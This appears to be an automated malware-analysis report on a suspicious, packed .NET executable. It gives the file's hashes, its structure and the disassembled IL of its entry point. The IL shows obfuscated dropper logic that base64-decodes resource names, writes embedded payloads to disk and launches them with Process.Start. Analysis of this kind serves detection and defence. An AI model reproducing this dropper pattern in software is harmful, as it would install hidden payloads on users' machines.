Suspicious
Suspect

e1c3b51e85583197055cc32270a110e1

PE Executable | MD5: e1c3b51e85583197055cc32270a110e1 | Size: 4.53 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
Hash Value
MD5
e1c3b51e85583197055cc32270a110e1
Sha1
22b77310e703ab819ac1ffd2335a93e8116b3319
Sha256
c34af1f1f238747d6839ce6857138e97d722443c4e2a794c072c236228ceaa07
Sha384
bf423a298cfc8ed143eb74de5d6a94acdb700d142f4712c67e56f09c10e3919e61fdb077e0dc0a2365ae03696dc437d9
Sha512
4374dcd71c9fa6271e5a92c45d24f17331d2543cb03a6966a0a9e59848f30d62210e22e37ffb1b2c4f55817a8ee3ff362808550e98ebdbe1c0387a030a3e2f7c
SSDeep
98304:zK70czp1bzpQ3cVmKdezCrH/0suAAjnswHtRt1tJSHo0:mNbzp2cjOCWAIswHtRt1tJB
TLSH
4C26337C86B8C56DC9270EFBC7F996BFC6017939D146E207A85BAE9636170940843F8C

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
tlasiyixfmcjtnjp.Resources
qapmmjakrvxjcpva
weebbzlqyletkngt
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

����������

Full Name

����������

EntryPoint

System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>()

Scope Name

����������

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

service

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

16

Main Method

System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>()

Main IL Instruction Count

166

Main IL

nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr 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
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String)
call System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String)
ldc.i4.2 <null>
newarr System.String[]
stloc.s V_4
ldloc.s V_4
ldc.i4.0 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_5
ldloc.s V_5
ldc.i4.0 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr bDh0MTFzSzVpZFhkaEQ1c1l3WXdrZz09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_5
ldc.i4.1 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr NGFVVld5djNkbDdqWkVmejgva25hUT09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_5
ldc.i4.2 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr d2VlYmJ6bHF5bGV0a25ndA==
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_5
ldc.i4.3 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_5
stelem.ref <null>
ldloc.s V_4
ldc.i4.1 <null>
ldc.i4.4 <null>
newarr System.String
stloc.s V_6
ldloc.s V_6
ldc.i4.0 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr bDh0MTFzSzVpZFhkaEQ1c1l3WXdrZz09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_6
ldc.i4.1 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr eDdmbUlnZThmZngxcDBaTU9mNjNDQT09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_6
ldc.i4.2 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr cWFwbW1qYWtydnhqY3B2YQ==
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_6
ldc.i4.3 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
stelem.ref <null>
ldloc.s V_6
stelem.ref <null>
ldloc.s V_4
stloc.0 <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr dGxhc2l5aXhmbWNqdG5qcA==
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly)
stloc.1 <null>
ldc.i4.0 <null>
stloc.2 <null>
br IL_01D6: ldloc.2
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.0 <null>
ldelem.ref <null>
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr VXBHQzFmYzlZeTNMVHNFNlhRRXlrRTdnd0VJM2REaGViU1Z1SmptczZzTT0=
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
call System.Boolean System.String::op_Equality(System.String,System.String)
brtrue IL_016D: call System.String System.IO.Directory::GetCurrentDirectory()
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.0 <null>
ldelem.ref <null>
call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String)
call System.String System.Environment::GetEnvironmentVariable(System.String)
br IL_0172: ldloc.0
call System.String System.IO.Directory::GetCurrentDirectory()
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.1 <null>
ldelem.ref <null>
call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String)
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.3 <null>
ldloc.3 <null>
ldloc.1 <null>
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.2 <null>
ldelem.ref <null>
callvirt System.Object System.Resources.ResourceManager::GetObject(System.String)
castclass System.Byte[]
call System.Byte[] lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.Byte[])
call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[])
ldloc.0 <null>
ldloc.2 <null>
ldelem.ref <null>
ldc.i4.3 <null>
ldelem.ref <null>
call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String)
nop <null>
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String)
call System.Boolean System.String::op_Equality(System.String,System.String)
brfalse IL_01D2: ldloc.2
ldloc.3 <null>
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String)
pop <null>
ldloc.2 <null>
ldc.i4.1 <null>
add <null>
stloc.2 <null>
ldloc.2 <null>
ldc.i4.2 <null>
blt IL_0135: ldloc.0
ret <null>

Characteristics
No malware configuration was found at this point.